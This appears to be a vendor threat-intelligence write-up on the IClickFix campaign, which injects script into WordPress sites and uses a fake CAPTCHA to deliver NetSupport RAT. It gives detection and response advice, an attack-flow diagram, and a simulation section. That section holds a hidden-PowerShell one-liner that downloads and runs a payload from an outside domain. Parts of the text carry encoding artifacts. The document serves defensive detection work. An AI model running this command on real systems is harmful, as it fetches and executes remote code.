SOC Prime Bias: Medium

03 Feb 2026 21:25
newspaper icon Sekoia.io Blog

Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The report profiles IClickFix, a malicious JavaScript framework that compromises WordPress sites and presents a spoofed Cloudflare Turnstile-style CAPTCHA. The lure coerces visitors into executing a PowerShell command that downloads and installs NetSupport RAT. Delivery is supported by a traffic distribution system built around the YOURLS URL shortener and a rotating set of redirector domains. Researchers observed more than 3,800 compromised WordPress sites serving this chain globally since late 2024.

Investigation

Sekoia analysts identified the injected JavaScript tag ic-tracker-js on compromised sites, then reconstructed the redirect flow across multiple short-lived domains. They captured the exact PowerShell execution pattern used to retrieve the final payload and recovered the dropped NetSupport RAT components along with associated C2 infrastructure indicators.

Mitigation

Monitor web content for the ic-tracker-js injection and block known malicious domains, redirectors, and short-link services used in the chain. On endpoints, detect PowerShell download-and-execute patterns consistent with the ClickFix lure. Add coverage for NetSupport client file creation and for persistence via user-level Run registry keys.

Response

When indicators surface, isolate the endpoint, stop the active PowerShell process, and remove NetSupport binaries plus any registry-based persistence. Follow with full forensic triage to confirm the attacker did not deploy additional implants or establish secondary access paths.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Compromise WordPress sites by exploiting core or popular plugin vulnerabilities (Elementor, WooCommerce, Gravity Forms)."] class action_initial_access action action_content_injection["<b>Action</b> – <b>T1659 Content Injection</b><br/>Inject malicious JavaScript containing the tag <i>icu2011trackeru2011js</i> into compromised pages to load attackeru2011controlled scripts."] class action_content_injection action action_software_extensions["<b>Action</b> – <b>T1176 Software Extensions</b><br/>Leverage vulnerable WordPress plugins as extensions to persist the malicious code on the site."] class action_software_extensions action action_dynamic_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Use YOURLS shortener and a chain of domains (e.g., ksfldfklskdmbxcvb.com) to resolve and deliver payloads while filtering bots."] class action_dynamic_resolution action action_obfuscated_payloads["<b>Action</b> – <b>T1027 Obfuscated/Stored Files</b><br/>Encode firstu2011stage JavaScript and PowerShell loader with Base64 and slice strings to evade detection."] class action_obfuscated_payloads action action_user_execution["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victims click the compromised WordPress URL, triggering the redirect chain."] class action_user_execution action action_input_injection["<b>Action</b> – <b>T1674 Input Injection & T1204.004 Malicious Copyu2011Paste</b><br/>JavaScript writes a PowerShell command to the clipboard and displays a fake Cloudflare Turnstile CAPTCHA lure."] class action_input_injection action action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Hidden PowerShell command executes, downloads secondu2011stage script <i>tytuy.json</i>, and drops NetSupport RAT."] class action_powershell action action_persistence["<b>Action</b> – <b>T1547.014 Boot or Logon Autostart Execution: Active Setup</b><br/>Create Run registry key pointing to <i>client32.exe</i> in ProgramData\S1kCMNfZi3, ensuring execution at startup."] class action_persistence action action_c2["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/>NetSupport RAT communicates over HTTPS to attackeru2011controlled domains (e.g., nightlomsknies.com/fakeurl.htm)."] class action_c2 action action_data_obfuscation["<b>Action</b> – <b>T1001 Data Obfuscation</b><br/>Obfuscate C2 traffic and payloads to hide malicious activity."] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core["<b>Tool</b> – <b>Name</b>: WordPress Core<br/><b>Vulnerability</b>: Remote code execution"] class tool_wordpress_core tool tool_elementor_plugin["<b>Tool</b> – <b>Name</b>: Elementor Plugin<br/><b>Vulnerability</b>: CVEu2011specific RCE"] class tool_elementor_plugin tool tool_yourls["<b>Tool</b> – <b>Name</b>: YOURLS Shortener<br/><b>Purpose</b>: URL redirection and dynamic resolution"] class tool_yourls tool malware_netsupport["<b>Malware</b> – <b>Name</b>: NetSupport RAT<br/><b>Capability</b>: Remote control and data exfiltration"] class malware_netsupport malware file_client32["<b>File</b> – <b>Name</b>: client32.exe<br/><b>Location</b>: ProgramData\S1kCMNfZi3"] class file_client32 file file_tyuy_json["<b>File</b> – <b>Name</b>: tytuy.json<br/><b>Purpose</b>: Secondu2011stage PowerShell script"] class file_tyuy_json file %% Connections action_initial_access –>|exploits| tool_wordpress_core tool_wordpress_core –>|provides entry| action_content_injection action_content_injection –>|injects script using| tool_elementor_plugin action_content_injection –>|leads to| action_software_extensions action_software_extensions –>|persists via| tool_elementor_plugin action_software_extensions –>|enables| action_dynamic_resolution action_dynamic_resolution –>|utilizes| tool_yourls action_dynamic_resolution –>|delivers| action_obfuscated_payloads action_obfuscated_payloads –>|produces| action_user_execution action_user_execution –>|triggers| action_input_injection action_input_injection –>|writes clipboard command| action_powershell action_powershell –>|downloads| file_tyuy_json file_tyuy_json –>|drops| malware_netsupport malware_netsupport –>|installs| action_persistence action_persistence –>|creates| file_client32 file_client32 –>|executed at startup| action_c2 malware_netsupport –>|communicates with| action_c2 action_c2 –>|uses| action_data_obfuscation "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:

    An adversary who has initial access to the endpoint wishes to establish a persistent foothold by delivering the NetSupport RAT. To evade interactive detection, they launch PowerShell in hidden mode with no profile or logo (-w hidden -nop -c). They then use Invoke‑WebRequest (iwr) to download a malicious JSON payload (tytuy.json) that contains a PowerShell script for the RAT. The script is written to the temporary directory and executed via Invoke‑Expression. This exact command line matches the strings the Sigma rule monitors.

  • Regression Test Script:

    # PowerShell one‑liner that matches the detection rule
$url = 'https://scottvmorton.com/tytuy.json'
$out = "$env:TEMPpayload.ps1"

powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"

  • Cleanup Commands:

    # Remove the downloaded payload and any lingering PowerShell processes
Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free